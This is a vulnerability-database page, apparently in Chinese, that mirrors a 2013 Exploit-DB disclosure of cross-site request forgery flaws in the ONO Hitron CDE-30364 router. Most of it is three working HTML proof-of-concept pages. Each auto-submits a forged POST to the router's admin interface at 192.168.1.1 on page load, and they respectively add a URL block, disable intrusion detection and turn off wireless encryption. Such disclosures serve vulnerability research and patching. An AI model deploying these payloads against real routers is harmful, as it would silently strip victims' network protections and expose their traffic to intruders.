Router ONO Hitron CDE-30364 - Cross-Site Request Forgery

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1065186 漏洞类型
发布时间 2013-09-14 更新时间 2013-09-14
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Hardware CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/28279
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: Router ONO Hitron CDE-30364 - CSRF Vulnerability
# Date: 14-9-2013
# Exploit Author: Matias Mingorance Svensson - matias.ms[at]owasp.org
# Vendor Homepage:
http://www.ono.es/clientes/te-ayudamos/dudas/internet/equipos/hitron/hitron-cde-30364/
# Tested on: Hitron Technologies CDE-30364
# Version HW: 1A
# Version SW: 3.1.0.8-ONO

-----------------------------------------------------------------------------------------
Introduction:
-----------------------------------------------------------------------------------------
Hitron Technologies CDE-30364 is a famous ONO Router using, also, a web
management interface in order to set and change device parameters.

The Hitron Technologies CDE-30364's web interface (listening on tcp/ip port
80) is prone to CSRF vulnerabilities which allows to change router
parameters and to perform many modifications to the router's parameters.
The default ip adress of this adsl router, used for management purpose, is
192.168.1.1.

-----------------------------------------------------------------------------------------
Exploit-1: Enable/Disable Web Site Blocking and add new Key Word/URL
blocking(google in this case)
-----------------------------------------------------------------------------------------
<html>
<body onload="javascript:document.forms[0].submit()">
<H2></H2>
<form method="POST" name="form0" action="
http://192.168.1.1/goform/Keyword?file=parent-website&dir=admin
%2F&checkboxName=on&blockingFlag=1&blockingAlertFlag=&cfKeyWord_Domain=&cfTrusted_MACAddress=&cfTrusted_MACAddress0=
0&cfTrusted_MACAddress1=0&cfTrusted_MACAddress2=0&cfTrusted_MACAddress3=0&cfTrusted_MACAddress4=0&cfTrusted_MACAddre
ss5=0&trustedMAC=&keyword0=google">
</body>
</html>

-----------------------------------------------------------------------------------------
Exploit-2: Enable/Disable Intrusion Detection System
-----------------------------------------------------------------------------------------
<html>
<body onload="javascript:document.forms[0].submit()">
<H2></H2>
<form method="POST" name="form0" action="
http://192.168.1.1/goform/Firewall?dir=admin%2F&file=feat-
firewall&ids_mode=0&IntrusionDMode=on&rspToPing=1">
</body>
</html>

-----------------------------------------------------------------------------------------
Exploit-3: Disable(None) Wireless Security Mode
-----------------------------------------------------------------------------------------
<html>
<body onload="javascript:document.forms[0].submit()">
<H2></H2>
<form method="POST" name="form0" action="
http://192.168.1.1/goform/Wls?dir=admin
%2F&file=wireless_e&key1=0000000000&key2=0000000000&key3=0000000000&key4=0000000000&k128_1=0000000000000000000000000
0&k128_2=00000000000000000000000000&k128_3=00000000000000000000000000&k128_4=00000000000000000000000000&ssid_list=0&
Encrypt_type=0">
</body>
</html>

-----------------------------------------------------------------------------------------
Many other changes can be performed.


-- 
Un saludo,
Mat�as Mingorance Svensson
*OWASP Foundation, Open Web Application Security Project*
https://www.owasp.org
http://es.linkedin.com/in/matiasms